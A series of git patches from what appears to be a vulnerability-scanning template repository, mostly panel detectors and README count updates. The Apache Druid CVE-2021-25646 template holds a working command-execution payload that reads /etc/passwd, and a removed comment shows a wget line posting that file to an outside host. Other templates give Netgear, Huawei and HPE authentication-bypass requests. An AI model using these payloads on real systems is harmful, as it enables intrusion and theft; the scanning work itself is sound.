0169/4083] minor update to check full header --- exposures/configs/javascript-env.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/exposures/configs/javascript-env.yaml b/exposures/configs/javascript-env.yaml index 5b7608c025..d2910508ea 100644 --- a/exposures/configs/javascript-env.yaml +++ b/exposures/configs/javascript-env.yaml @@ -24,10 +24,10 @@ requests: status: - 200 - - type: word + - type: dsl part: header - words: - - "application/javascript" + dsl: + - "contains(tolower(all_headers), 'content-type: application/javascript')" - type: word part: body @@ -41,4 +41,4 @@ requests: - "KEY" - "PASSWORD" - "VERSION" - condition: or + condition: or \ No newline at end of file From c9f202f2b05aaac3c07bf893130a7066f7fea6b2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 30 Jun 2021 14:01:36 +0000 Subject: [PATCH 0170/4083] Auto Update README [Wed Jun 30 14:01:36 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7afb46af0f..0de60c4611 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 367 | vulnerabilities | 201 | exposed-panels | 171 | -| takeovers | 69 | exposures | 106 | technologies | 107 | +| takeovers | 69 | exposures | 107 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1380 files**. +**120 directories, 1381 files**. From d06f0efe2fbea8c9b1bac5292d8cc6423a87bdf4 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 19:58:03 +0530 Subject: [PATCH 0171/4083] Update sonicwall-email-security-detect.yaml --- technologies/sonicwall-email-security-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/sonicwall-email-security-detect.yaml b/technologies/sonicwall-email-security-detect.yaml index eb57bc826e..5f8f24e3d8 100644 --- a/technologies/sonicwall-email-security-detect.yaml +++ b/technologies/sonicwall-email-security-detect.yaml @@ -12,7 +12,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/pics/branding/favicon.ico" + - "{{BaseURL}}/favicon.ico" matchers: - type: dsl From e723123779f04897966413d999202347067e6613 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 30 Jun 2021 14:29:04 +0000 Subject: [PATCH 0172/4083] Auto Update README [Wed Jun 30 14:29:04 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 0de60c4611..3e71c31dfa 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 367 | vulnerabilities | 201 | exposed-panels | 171 | -| takeovers | 69 | exposures | 107 | technologies | 107 | +| takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1381 files**. +**120 directories, 1382 files**. From cfcb739fbc5815fea387d61d50591c92a22e152d Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 30 Jun 2021 20:28:41 +0530 Subject: [PATCH 0173/4083] more changes --- cves/2021/CVE-2021-25646.yaml | 55 ++++++++++++++++++++++++++++------- 1 file changed, 44 insertions(+), 11 deletions(-) diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index 71fd070b06..18337fab07 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -15,17 +15,45 @@ requests: - | POST /druid/indexer/v1/sampler HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) - Accept: application/json, text/plain, */* + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/json - Content-Length: 571 + Content-Length: 1006 Connection: close - - {"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"odgjxrrrePz","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~echo lgxTckL7cwJwki6GTZbjf9gF6BTSZTGO\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}} - - # To read system Files, replace (wget example.com) with below payload - # wget --post-file /etc/passwd http://xxxxxxx.burpcollaborator.net + { + "type":"index", + "spec":{ + "ioConfig":{ + "type":"index", + "firehose":{ + "type":"local", + "baseDir":"/etc", + "filter":"passwd" + } + }, + "dataSchema":{ + "dataSource":"odgjxrrrePz", + "parser":{ + "parseSpec":{ + "format":"javascript", + "timestampSpec":{ + + }, + "dimensionsSpec":{ + + }, + "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}", + "":{ + "enabled":"true" + } + } + } + } + }, + "samplerConfig":{ + "numRows":10 + } + } matchers-condition: and matchers: @@ -36,10 +64,15 @@ requests: words: - "application/json" part: header - condition: and - - type: regex - regex: + + - type: word + words: - "numRowsRead" - "numRowsIndexed" part: body condition: and + + - type: regex + regex: + - "root:[x*]:0:0:" + part: body From d1f47657a94d1402cdf6cc0597c20e081b21a5dc Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 30 Jun 2021 20:31:15 +0530 Subject: [PATCH 0174/4083] Update CVE-2021-25646.yaml --- cves/2021/CVE-2021-25646.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index 18337fab07..726db1c2e9 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -37,10 +37,10 @@ requests: "parseSpec":{ "format":"javascript", "timestampSpec":{ - + }, "dimensionsSpec":{ - + }, "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}", "":{ From c2b2668d80884c16282b06eadafa6bd1dbec93eb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 30 Jun 2021 15:06:52 +0000 Subject: [PATCH 0175/4083] Auto Update README [Wed Jun 30 15:06:52 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 3e71c31dfa..d55754af54 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 367 | vulnerabilities | 201 | exposed-panels | 171 | +| cves | 367 | vulnerabilities | 201 | exposed-panels | 172 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1382 files**. +**120 directories, 1383 files**. From 446e2c4e645918cbc98b190ec1c5bc5f234ce91d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 20:38:00 +0530 Subject: [PATCH 0176/4083] more changes --- exposed-panels/wildfly-panel.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/wildfly-panel.yaml b/exposed-panels/wildfly-panel.yaml index 87563eb4c3..78bc863684 100644 --- a/exposed-panels/wildfly-panel.yaml +++ b/exposed-panels/wildfly-panel.yaml @@ -10,8 +10,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" - redirects: true + - "{{BaseURL}}" matchers-condition: and matchers: From 6782b19b454562e91691e38041ba15185ba1a806 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 30 Jun 2021 15:10:22 +0000 Subject: [PATCH 0177/4083] Auto Update README [Wed Jun 30 15:10:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d55754af54..59cc44fe02 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 367 | vulnerabilities | 201 | exposed-panels | 172 | +| cves | 367 | vulnerabilities | 201 | exposed-panels | 173 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1383 files**. +**120 directories, 1384 files**. From 6d967625edd022bf050c290168fb7eebd00862fa Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 20:57:56 +0530 Subject: [PATCH 0178/4083] misc changes --- exposed-panels/key-cloak-admin-panel.yaml | 11 ++++++++++- keycloak-panel.yaml | 24 ----------------------- 2 files changed, 10 insertions(+), 25 deletions(-) delete mode 100644 keycloak-panel.yaml diff --git a/exposed-panels/key-cloak-admin-panel.yaml b/exposed-panels/key-cloak-admin-panel.yaml index 464a7184b7..0886590071 100644 --- a/exposed-panels/key-cloak-admin-panel.yaml +++ b/exposed-panels/key-cloak-admin-panel.yaml @@ -3,16 +3,25 @@ id: key-cloak-admin-panel info: name: Keycloak Admin Panel author: incogbyte - severity: low + severity: info tags: panel requests: - method: GET path: - "{{BaseURL}}/auth/admin/master/console/" + - "{{BaseURL}}/auth/admin" + redirects: true + max-redirects: 2 matchers: + - type: word words: - "" + part: body + + - type: word + words: + - "keycloak" part: body \ No newline at end of file diff --git a/keycloak-panel.yaml b/keycloak-panel.yaml deleted file mode 100644 index 3a89fac6e5..0000000000 --- a/keycloak-panel.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: keycloak-panel - -info: - name: Keycloak Instance Detection Template - author: righettod - severity: info - description: Try to detect the presence of a Keycloak instance via the login panel - tags: panel,keycloak - -requests: - - method: GET - path: - - "{{BaseURL}}/auth/admin" - redirects: true - - matchers-condition: and - matchers: - - type: word - words: - - "keycloak" - - - type: status - status: - - 200 \ No newline at end of file From 1f72291cd25fa1369c3e5604f9f7c30ab83e6b33 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 20:58:43 +0530 Subject: [PATCH 0179/4083] Update key-cloak-admin-panel.yaml --- exposed-panels/key-cloak-admin-panel.yaml | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/exposed-panels/key-cloak-admin-panel.yaml b/exposed-panels/key-cloak-admin-panel.yaml index 0886590071..a927762b28 100644 --- a/exposed-panels/key-cloak-admin-panel.yaml +++ b/exposed-panels/key-cloak-admin-panel.yaml @@ -2,7 +2,7 @@ id: key-cloak-admin-panel info: name: Keycloak Admin Panel - author: incogbyte + author: incogbyte,righettod severity: info tags: panel @@ -19,9 +19,6 @@ requests: - type: word words: - "" - part: body - - - type: word - words: - "keycloak" - part: body \ No newline at end of file + part: body + condition: or \ No newline at end of file From d5882ef629f3e5bd62a88723fb724f4a4cce39f3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 21:14:24 +0530 Subject: [PATCH 0180/4083] minor update --- ...{Spectracom.yaml => spectracom-default-credential.yaml} | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) rename default-logins/spectracom/{Spectracom.yaml => spectracom-default-credential.yaml} (86%) diff --git a/default-logins/spectracom/Spectracom.yaml b/default-logins/spectracom/spectracom-default-credential.yaml similarity index 86% rename from default-logins/spectracom/Spectracom.yaml rename to default-logins/spectracom/spectracom-default-credential.yaml index 66bd5a58a0..408747ba1f 100644 --- a/default-logins/spectracom/Spectracom.yaml +++ b/default-logins/spectracom/spectracom-default-credential.yaml @@ -1,9 +1,10 @@ -id: Spectracom +id: spectracom-default-credential + info: name: Spectracom Default creds author: madrobot severity: medium - tags: creds + tags: spectracom,default-login requests: - raw: @@ -24,6 +25,8 @@ requests: - "spectracom" - "deleted" part: header + condition: and + - type: status status: - 302 From 1dd7fdf45708c854f02b8ebd3ed416d25877ea32 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 30 Jun 2021 15:48:28 +0000 Subject: [PATCH 0181/4083] Auto Update README [Wed Jun 30 15:48:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 59cc44fe02..e24f60181b 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 367 | vulnerabilities | 201 | exposed-panels | 173 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | -| default-logins | 32 | file | 42 | dns | 10 | +| default-logins | 33 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1384 files**. +**121 directories, 1385 files**. From 2d63ddfa2002b8956ba10ad3857dae87189a14ed Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 21:27:06 +0530 Subject: [PATCH 0182/4083] minor update --- cves/2021/CVE-2021-29203.yaml | 22 +++++++++++++--------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml index 4150776495..92cbe77690 100644 --- a/cves/2021/CVE-2021-29203.yaml +++ b/cves/2021/CVE-2021-29203.yaml @@ -4,7 +4,9 @@ info: author: madrobot severity: critical tags: hpe,cve,cve2021,bypass - reference: https://www.tenable.com/security/research/tra-2021-15 + reference: | + - https://www.tenable.com/security/research/tra-2021-15 + - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 requests: - raw: @@ -17,7 +19,8 @@ requests: Content-Type: application/json Connection: close - {"Password":"attacker"} + {"Password":"{{randstr}}"} + - | POST /redfish/v1/SessionService/Sessions/ HTTP/1.1 Host: {{Hostname}} @@ -26,23 +29,24 @@ requests: Content-Type: application/json Connection: close - {"UserName":"Administrator","Password":"attacker"} + {"UserName":"Administrator","Password":"{{randstr}}"} matchers-condition: and matchers: + - type: status status: - 201 + - type: word + condition: and + part: header words: - "X-Auth-Token" - "PasswordReset" - "Location" - condition: and - part: header + - type: word - words: - - "MessageID" - - "ExtendedInfo" part: body - condition: and + words: + - "Base.1.0.Created" From 86b2db2f92f7109de9d905012297adb8e3af38d5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 30 Jun 2021 15:57:52 +0000 Subject: [PATCH 0183/4083] Auto Update README [Wed Jun 30 15:57:52 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e24f60181b..58d7c8846a 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 367 | vulnerabilities | 201 | exposed-panels | 173 | +| cves | 368 | vulnerabilities | 201 | exposed-panels | 173 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 33 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**121 directories, 1385 files**. +**121 directories, 1386 files**. From 4b92226c64a0f16dbb4901b6df35838ddd2c2da5 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 30 Jun 2021 22:01:12 +0530 Subject: [PATCH 0184/4083] Added detect-rsyncd --- network/detect-rsyncd.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 network/detect-rsyncd.yaml diff --git a/network/detect-rsyncd.yaml b/network/detect-rsyncd.yaml new file mode 100644 index 0000000000..3083708997 --- /dev/null +++ b/network/detect-rsyncd.yaml @@ -0,0 +1,28 @@ +id: detect-rsyncd + +info: + name: Detect rsyncd + reference: https://linux.die.net/man/1/rsync + author: vsh00t,geeknik + severity: info + tags: network,rsyncd + +network: + - inputs: + - data: "?\r\n" + + host: + - "{{Hostname}}" + - "{{Hostname}}:873" + + matchers: + - type: word + words: + - "RSYNCD: " + - "ERROR: protocol startup error" + condition: and + + extractors: + - type: regex + regex: + - 'RSYNCD: \d\d.\d' From f9f8f52898dfe826c21ecc726318d2a29a3707fc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 30 Jun 2021 16:35:47 +0000 Subject: [PATCH 0185/4083] Auto Update README [Wed Jun 30 16:35:47 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 58d7c8846a..14b4b8d85b 100644 --- a/README.md +++ b/README.md @@ -44,7 +44,7 @@ An overview of the nuclei template directory including number of templates assoc | default-logins | 33 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**121 directories, 1386 files**. +**121 directories, 1387 files**. From 3802723219b997cecd1d3e4011eef255f3f8fddf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 30 Jun 2021 23:39:47 +0530 Subject: [PATCH 0186/4083] Update CVE-2013-3827.yaml --- cves/2013/CVE-2013-3827.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml index d8465e8d2c..af44677113 100644 --- a/cves/2013/CVE-2013-3827.yaml +++ b/cves/2013/CVE-2013-3827.yaml @@ -5,6 +5,7 @@ info: author: Random-Robbie severity: medium description: Javafaces LFI + tags: cve,cve2013,lfi requests: - method: GET From 6a6607c282c2f0da3dd67d9b35c47b2781b81902 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 30 Jun 2021 23:43:06 +0530 Subject: [PATCH 0187/4083] Update and rename CVE-2021-24406.yaml to cves/2021/CVE-2021-24406.yaml --- CVE-2021-24406.yaml => cves/2021/CVE-2021-24406.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename CVE-2021-24406.yaml => cves/2021/CVE-2021-24406.yaml (94%) diff --git a/CVE-2021-24406.yaml b/cves/2021/CVE-2021-24406.yaml similarity index 94% rename from CVE-2021-24406.yaml rename to cves/2021/CVE-2021-24406.yaml index b88fc2ac9f..5ef2b21f2c 100644 --- a/CVE-2021-24406.yaml +++ b/cves/2021/CVE-2021-24406.yaml @@ -6,7 +6,7 @@ info: description: The plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login. reference: https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388 severity: low - tags: wp,redirect,cves + tags: wordpress,redirect,cve,cve2021 requests: - method: GET From b6e75321ef5a5a1fd74c21ed72211d879d804b06 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 30 Jun 2021 18:14:24 +0000 Subject: [PATCH 0188/4083] Auto Update README [Wed Jun 30 18:14:24 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 14b4b8d85b..50dedc012a 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 368 | vulnerabilities | 201 | exposed-panels | 173 | +| cves | 369 | vulnerabilities | 201 | exposed-panels | 173 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 33 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**121 directories, 1387 files**. +**121 directories, 1388 files**. From f44c3e597f9a08b2547514f2ae37f82f4f052d5b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 30 Jun 2021 23:45:27 +0530 Subject: [PATCH 0189/4083] Update and rename CVE-2021-24210.yaml to cves/2021/CVE-2021-24210.yaml --- CVE-2021-24210.yaml => cves/2021/CVE-2021-24210.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename CVE-2021-24210.yaml => cves/2021/CVE-2021-24210.yaml (94%) diff --git a/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml similarity index 94% rename from CVE-2021-24210.yaml rename to cves/2021/CVE-2021-24210.yaml index 0feacdcff3..66627bd36e 100644 --- a/CVE-2021-24210.yaml +++ b/cves/2021/CVE-2021-24210.yaml @@ -6,7 +6,7 @@ info: description: There is an open redirect in the plugin that allows an attacker to malform a request to a page with the plugin and then redirect the victim to a malicious page. reference: https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb severity: low - tags: wp,cves,redirect + tags: wordpress,cve,cve2021,redirect requests: - method: GET From e9ec3bf8c135a12ef22ee688b357331af6d91063 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 30 Jun 2021 18:30:22 +0000 Subject: [PATCH 0190/4083] Auto Update README [Wed Jun 30 18:30:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 50dedc012a..f7bc95fede 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 369 | vulnerabilities | 201 | exposed-panels | 173 | +| cves | 370 | vulnerabilities | 201 | exposed-panels | 173 | | takeovers | 69 | exposures | 107 | technologies | 108 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 33 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**121 directories, 1388 files**. +**121 directories, 1389 files**. From 385e53644b480931b1134c8c7b2ecbca2d41225d Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 1 Jul 2021 09:01:12 +0900 Subject: [PATCH 0191/4083] Create nutanix-web-console-login.yaml Signed-off-by: GwanYeong Kim --- exposed-panels/nutanix-web-console-login.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/nutanix-web-console-login.yaml diff --git a/exposed-panels/nutanix-web-console-login.yaml b/exposed-panels/nutanix-web-console-login.yaml new file mode 100644 index 0000000000..b4c1dfa884 --- /dev/null +++ b/exposed-panels/nutanix-web-console-login.yaml @@ -0,0 +1,22 @@ +id: nutanix-web-console-login + +info: + name: Nutanix web console login page + author: gy741 + severity: info + description: Default Credentials of admin:admin on Nutanix web console. + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/console/' + + matchers-condition: and + matchers: + - type: word + words: + - "Nutanix Web Console" + - type: status + status: + - 200 From 4d56d47c693aaab95d47b16cd784b30f5f5580ca Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 1 Jul 2021 09:28:30 +0900 Subject: [PATCH 0192/4083] Create huawei-router-auth-bypass.yaml The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. Signed-off-by: GwanYeong Kim --- .../other/huawei-router-auth-bypass.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 vulnerabilities/other/huawei-router-auth-bypass.yaml diff --git a/vulnerabilities/other/huawei-router-auth-bypass.yaml b/vulnerabilities/other/huawei-router-auth-bypass.yaml new file mode 100644 index 0000000000..088faacef9 --- /dev/null +++ b/vulnerabilities/other/huawei-router-auth-bypass.yaml @@ -0,0 +1,35 @@ +id: huawei-router-auth-bypass + +info: + name: Huawei Router Authentication Bypass + author: gy741 + severity: critical + description: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. + reference: | + - https://www.exploit-db.com/exploits/50059 + - https://www.exploit-db.com/exploits/48310 + tags: huawei,auth-bypass + +requests: + - raw: + - | + GET /api/system/deviceinfo HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 + Accept: application/json, text/javascript, */*; q=0.01 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Referer: {{BaseURL}} + X-Requested-With: XMLHttpRequest + Connection: close + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "DeviceName" + - "SerialNumber" From c0ebf56f85649b54c0cd6a63cf2beffa60d8ca97 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 1 Jul 2021 14:39:10 +0900 Subject: [PATCH 0193/4083] Create netgear-router-auth-bypass.yaml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”). Signed-off-by: GwanYeong Kim --- .../other/netgear-router-auth-bypass.yaml | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 vulnerabilities/other/netgear-router-auth-bypass.yaml diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml new file mode 100644 index 0000000000..332c456650 --- /dev/null +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -0,0 +1,41 @@ +id: netgear-router-auth-bypass + +info: + name: Netgear DGN2200v1 Router Authentication Bypass + author: gy741 + severity: high + description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”). + reference: | + - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ + - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 + tags: netgear,auth-bypass + +requests: + - raw: + - | + GET /WAN_wan.htm?.gif HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 + Connection: close + Accept: */* + Accept-Language: en + Accept-Encoding: gzip + + - | + GET /WAN_wan.htm?.gif HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 + Connection: close + Accept: */* + Accept-Language: en + Accept-Encoding: gzip + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "WAN Setup" From 492c8480ca714e379a9c2c1882544ed6e3e09d07 Mon Sep 17 00:00:00 2001 From: Keiran Smith Date: Thu, 1 Jul 2021 14:17:40 +0100 Subject: [PATCH 0194/4083] Add OctoPrint panel detection --- exposed-panels/octoprint-login.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/octoprint-login.yaml diff --git a/exposed-panels/octoprint-login.yaml b/exposed-panels/octoprint-login.yaml new file mode 100644 index 0000000000..37d23206f0 --- /dev/null +++ b/exposed-panels/octoprint-login.yaml @@ -0,0 +1,22 @@ +id: octoprint-panel + +info: + name: OctoPrint Login + author: affix + severity: info + tags: octoprint,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/login/" + + matchers-condition: and + matchers: + - type: word + words: + - 'OctoPrint Login' + + - type: status + status: + - 200 \ No newline at end of file From 600b6e96057aa0810b942466ab5bbf2eedec33c7 Mon Sep 17 00:00:00 2001 From: Keiran Smith Date: Thu, 1 Jul 2021 14:27:43 +0100 Subject: [PATCH 0195/4083] Match on BaseURL and /login --- exposed-panels/octoprint-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/octoprint-login.yaml b/exposed-panels/octoprint-login.yaml index 37d23206f0..c315a55380 100644 --- a/exposed-panels/octoprint-login.yaml +++ b/exposed-panels/octoprint-login.yaml @@ -9,6 +9,7 @@ info: requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/login/" matchers-condition: and From 30dedb9a662188c397d3550f89767668074f9971 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Jul 2021 13:29:34 +0000 Subject: [PATCH 